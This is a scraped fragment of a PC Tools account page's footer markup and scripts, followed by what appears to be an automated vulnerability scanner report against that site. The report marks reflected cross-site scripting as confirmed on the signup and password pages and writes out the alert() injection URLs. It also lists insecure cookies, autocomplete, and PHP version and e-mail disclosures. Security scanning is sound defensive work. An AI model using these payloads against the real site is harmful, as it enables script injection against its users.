href="http://www.browserdefender.com/">Browser Defender</a></li></ul><ul> <li class="footer-header">Utility Software</li> <li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup>™</sup> Performance Toolkit</a></li> <li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup>™</sup></a></li> <li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup>™</sup> Simple Backup</a></li> <li><a href="http://www.pctools.com/file-recover/">PC Tools<sup>™</sup> File Recover</a></li> <li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup>™</sup> Privacy Guardian</a></li> <li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li> <li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul><ul class="narrow"> <li class="footer-header">Links</li> <li><a href="http://www.pctools.com/security-news/glossary/">Adware Glossary</a></li> <li><a href="http://www.pctools.com/mrc/dispute/">Spyware Disputes</a></li> <li><a href="http://www.pctools.com/security-news/">Security News</a></li> <li><a href="http://www.pctools.com/sitemap/">Sitemap</a></li> <li><a href="http://www.pctools.com/mrc/infections/">Infection Database</a></li></ul><ul class="narrow"> <li class="footer-header">Company</li> <li><a href="http://www.pctools.com/company/">About Us</a></li> <li><a href="http://www.pctools.com/company/awards/">Awards</a></li> <li><a href="http://www.pctools.com/labs/">Labs</a></li> <li><a href="http://www.pctools.com/partners/">Partners</a></li></ul><div class="social"> <span class="footer-header">Get Updates</span><br> <span class="ok" id="subscriberesult_btm"></span> <form action="/newsletter/subscribe/" name="softmail" method="post"> <input type="hidden" value="" name="detail_id" /> <input type="hidden" value="default" name="product" /> <input type="text" title="Enter your e-mail address" id="email_btm" name="email" class="blur" /> <input type="submit" onclick="newsletterSubscribe_btm(); return false;" value="Submit" /> <input type="hidden" value="1" name="submitted"> </form> <ul class="social-links"> <li id="facebook"><img src="/res/new/images/facebook.png">  <a href="http://www.facebook.com/PCTOOLS">Find us on Facebook</a></li> <li id ="like"><iframe src="http://www.facebook.com/plugins/like.php?href=secure.pctools.com/myaccount/&layout=button_count&width=90&action=like&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:20px;" allowTransparency="true"></iframe></li> <li id="twitter" ><img src="/res/new/images/twitter.png">  <a href="http://twitter.com/pctools">Find us on Twitter</a></li> </ul> </div> <div style="clear:both"></div> <script type="text/javascript"> function Ajax() { // This is how we make Private variables. var http_request = false var callback_fctn = false // This is how we make a Private method - it is the only way to access the Private variables above. function contents() { if( http_request.readyState == 4 ) { if( http_request.status == 200 ) { callback_fctn(http_request) } http_request = false callback_fctn = false } } // And this is a Privileged method - it cannot be replaced, but it has Public accessability and can work with Private variables and methods. // (Many people would call this a Public method, which is almost correct insofar as it is available publically.) this.request = function(url, return_fctn, post_data) { if( http_request ) // Oops: request in process! return false if( window.XMLHttpRequest ) { // Mozilla, Safari,... http_request = new XMLHttpRequest() // This might be reqiured for Mozilla at some point // if( http_request.overrideMimeType ) http_request.overrideMimeType('text/xml'); } else if( window.ActiveXObject ) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP") } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { } } } if( !http_request ) { // alert('Giving up -- Cannot create an XMLHTTP instance'); return false; } // Anonymous functions like this lead to memory leaks in IE6, unfortunately. // this.http_request.onreadystatechange = function() { Ajax.contents(http_request, return_fctn); }; callback_fctn = return_fctn http_request.onreadystatechange = contents; if( post_data ) { http_request.open('POST', url, true); http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); http_request.setRequestHeader('Cookie', document.cookie); http_request.send(post_data); } else { http_request.open('GET', url, true) http_request.setRequestHeader('Cookie', document.cookie); http_request.send(null); } return true; };}</script><script type="text/javascript">var supportAjax_btm = new Ajax();var theElement_btm = "subscriberesult_btm";function updateView_btm(request) { if (document.getElementById(theElement_btm) && request.responseText != "") { document.getElementById(theElement_btm).style.display = ''; document.getElementById(theElement_btm).innerHTML = request.responseText; }}function newsletterSubscribe_btm() { supportAjax_btm.request('/res/ajax/newsletter.php?email=' + encodeURIComponent(document.getElementById('email_btm').value) + '&product=myaccount&language=en',updateView_btm);}</script> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="250" class="noprint"> </td> <td class="copy" align="center">Copyright © 1998-2011 PC Tools. All rights reserved.</td> <td class="copy noprint" width="250" align="right"><a href="http://www.symantec.com/">Symantec</a> | <a href="http://us.norton.com/">Norton</a> | <a href="http://www.verisign.com/">Verisign</a> | <a href="http://www.pctools.com/info/privacypolicy/" rel="NOFOLLOW">Privacy Policy</a> | <a href="http://www.pctools.com/info/legalnotices/" rel="NOFOLLOW">Legal Notices & Terms</a> </td> </tr></table></div><script type='text/javascript'> jQuery(document).ready(function(){ jQuery('#language_list_div').css({position: 'absolute', left: (jQuery('#topnav').offset().left + jQuery('#topnav').outerWidth() - jQuery('#lang').outerWidth()) + 'px',top: (jQuery('#topnav').offset().top /3)+'px'}) jQuery(window).resize(function(){ jQuery('#language_list_div').css({position: 'absolute', left: (jQuery('#topnav').offset().left + +jQuery('#topnav').outerWidth() - jQuery('#lang').outerWidth()) + 'px',top: (jQuery('#topnav').offset().top /3)+'px'}) }); });</script><div id="language_list_div"><script type="text/javascript">function select_language() { change_to = document.getElementById('lang').value; if(change_to != "") { document.location.href=change_to; }}</script> <form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/myaccount/password/"> <select style="visibility:hidden;" name="language" size="1" onchange="select_language();" id="lang"><option selected>English</option><option value="/de/myaccount/password/">Deutsch</option><option value="/es/myaccount/password/">Español</option..

XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection

Total Requests

Average Speed

GHDB, DORK Tests

VULNERABILITIES

Cross-site Scripting

Impact

Remedy

Remedy References

External References

/myaccount/signup/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E CONFIRMED

Parameters

Request

Response

/myaccount/password/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000746)%3C/script%3E CONFIRMED

Parameters

Request

Response

Cookie Not Marked As Secure

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

/myaccount/ CONFIRMED

Identified Cookie

Request

Response

Auto Complete Enabled

Impact

Remedy

Actions to Take

Required Skills for Successful Exploitation

External References

/myaccount/ CONFIRMED

Identified Field Name

Request

Response

Cookie Not Marked As HttpOnly

Impact

Actions to Take

Remedy

External References

/myaccount/ CONFIRMED

Identified Cookie

Request

Response

PHP Version Disclosure

Impact

/myaccount/

Extracted Version

Request

Response

E-mail Address Disclosure

Impact

Remedy

External References

/myaccount/password/

Found E-mails

Request

Response